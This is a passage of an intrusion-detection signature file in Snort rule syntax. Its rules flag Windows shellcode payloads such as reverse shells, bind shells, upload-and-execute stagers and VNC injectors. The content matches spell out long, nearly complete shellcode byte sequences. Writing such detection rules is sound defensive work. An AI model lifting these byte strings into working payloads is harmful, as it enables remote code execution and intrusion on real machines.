8b 55 |"; content:"| ec 8b 02 8b 4d ec 51 8b 50 1c ff d2 8d 45 f8 50 8b 4d e0 8b 11 8b 45 e0 50 8b 4a 1c ff d1 31 c0 50 8b 55 f8 8b 02 8b 4d f8 51 8b 50 24 ff d2 31 db 53 53 68 02 00 00 |"; content:"| 89 e0 6a 10 50 8b 7d 0c 57 ff 55 24 53 57 ff 55 28 53 54 57 ff 55 20 89 c7 68 43 4d 44 00 89 e3 87 fa 31 c0 8d 7c 24 ac 6a 15 59 f3 ab 87 fa 83 ec 54 c6 44 24 10 44 66 c7 44 24 3c 01 01 89 7c 24 48 89 7c 24 4c 89 7c 24 50 8d 44 24 10 54 50 51 51 51 41 51 49 51 51 53 51 ff 75 00 68 72 fe b3 16 ff 55 04 ff d0 89 e6 ff 75 00 68 ad d9 05 ce ff 55 04 89 c3 6a ff ff 36 ff d3 ff 75 00 68 7e d8 e2 73 ff 55 04 31 db 53 ff d0 |"; sid:1000174; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell_reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 89 c7 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 68 63 6d 64 00 89 e3 57 57 57 31 f6 6a 12 59 56 e2 fd 66 c7 44 24 3c 01 01 8d 44 24 10 c6 00 44 54 50 56 56 56 46 56 4e 56 56 53 56 68 79 cc 3f 86 ff d5 89 e0 4e 56 46 ff 30 68 08 87 1d 60 ff d5 bb f0 b5 a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 53 ff d5 |"; sid:1000175; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/speak_pwned"; flow:established; content:"| 66 81 e4 fc ff 31 f6 64 8b 76 30 8b 76 0c 8b 76 1c 56 66 be aa 1a 5f 8b 6f 08 ff 37 8b 5d 3c 8b 5c 1d 78 01 eb 8b 4b 18 67 e3 eb 8b 7b 20 01 ef 8b 7c 8f fc 01 ef 31 c0 99 32 17 66 c1 ca 01 ae 75 f7 49 66 39 f2 74 08 67 e3 cb e9 db ff ff ff 8b 73 24 01 ee 0f b7 34 4e 8b 43 1c 01 e8 8b 3c b0 01 ef 31 f6 66 81 fa da f0 74 1b 66 81 fa 69 27 74 20 6a 32 68 6f 6c 65 33 54 ff d7 95 66 be da f0 e9 95 ff ff ff 56 ff d7 66 be 69 27 e9 89 ff ff ff 68 6e 04 22 d4 68 a1 ec ef 99 68 b9 72 92 49 68 74 df 44 6c 89 e0 68 4f 79 73 96 68 9e e3 01 c0 ff 4c 24 02 68 91 33 d2 11 68 77 93 74 96 89 e3 56 54 50 6a 17 56 53 ff d7 5b 68 6f 67 20 55 68 6f 70 20 74 68 21 64 6e 68 96 89 e6 50 ac 66 50 3c 55 75 f9 89 e1 31 c0 50 50 51 53 8b 13 8b 4a 50 ff d1 cc |"; sid:1000176; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000177; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000178; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000179; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000180; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_http"; flow:established; content:"| fc e8 ac 00 00 00 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 5c 5a 6f 6e 65 73 5c 33 00 31 30 30 34 31 32 30 30 31 32 30 31 31 30 30 31 43 3a 5c 70 72 6f 67 72 61 7e 31 5c 69 6e 74 65 72 6e 7e 31 5c 69 65 78 70 6c 6f 72 65 20 2d 6e 65 77 20 68 74 74 70 3a 2f 2f |"; content:"| 3a 38 30 30 30 2f |"; content:"| 00 e8 4e 00 00 00 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 32 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c2 08 00 5f 5b 31 d2 64 8b 42 30 85 c0 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 34 83 c0 7c 8b 40 3c 89 e5 68 7e d8 e2 73 50 68 72 fe b3 16 50 68 8e 4e 0e ec 50 ff d7 96 ff d7 89 45 00 ff d7 89 45 04 52 68 70 69 33 32 |"; content:"| 68 61 64 76 61 54 ff d6 68 a9 2b 92 02 50 68 dd 9a 1c 2d 50 ff d7 89 45 08 ff d7 97 87 f3 54 56 68 01 00 00 |"; content:"| ff d7 5b 83 c6 44 50 89 e7 80 3e 43 74 1b 50 ad 50 89 e0 6a 04 57 6a 04 6a 00 50 53 ff 55 08 eb e8 8a 0d 30 00 fe 7f 88 0e 6a 54 59 29 cc 89 e7 57 f3 aa 5f c6 07 44 fe 47 2c fe 47 2d 68 75 6c 74 00 68 44 65 66 61 68 74 61 30 5c 68 57 69 6e 53 89 67 08 8d 5f 44 53 57 50 50 6a 10 50 50 50 56 50 ff 55 00 ff 55 04 |"; sid:1000181; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000182; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000183; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000184; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000185; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000186; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/upexec/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000187; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000188; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000189; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000190; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000191; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_http"; flow:established; content:"| fc e8 ac 00 00 00 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 5c 5a 6f 6e 65 73 5c 33 00 31 30 30 34 31 32 30 30 31 32 30 31 31 30 30 31 43 3a 5c 70 72 6f 67 72 61 7e 31 5c 69 6e 74 65 72 6e 7e 31 5c 69 65 78 70 6c 6f 72 65 20 2d 6e 65 77 20 68 74 74 70 3a 2f 2f |"; content:"| 3a 38 30 30 30 2f |"; content:"| 00 e8 4e 00 00 00 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 32 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c2 08 00 5f 5b 31 d2 64 8b 42 30 85 c0 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 34 83 c0 7c 8b 40 3c 89 e5 68 7e d8 e2 73 50 68 72 fe b3 16 50 68 8e 4e 0e ec 50 ff d7 96 ff d7 89 45 00 ff d7 89 45 04 52 68 70 69 33 32 |"; content:"| 68 61 64 76 61 54 ff d6 68 a9 2b 92 02 50 68 dd 9a 1c 2d 50 ff d7 89 45 08 ff d7 97 87 f3 54 56 68 01 00 00 |"; content:"| ff d7 5b 83 c6 44 50 89 e7 80 3e 43 74 1b 50 ad 50 89 e0 6a 04 57 6a 04 6a 00 50 53 ff 55 08 eb e8 8a 0d 30 00 fe 7f 88 0e 6a 54 59 29 cc 89 e7 57 f3 aa 5f c6 07 44 fe 47 2c fe 47 2d 68 75 6c 74 00 68 44 65 66 61 68 74 61 30 5c 68 57 69 6e 53 89 67 08 8d 5f 44 53 57 50 50 6a 10 50 50 50 56 50 ff 55 00 ff 55 04 |"; sid:1000192; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000193; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000194; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/vncinject/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff 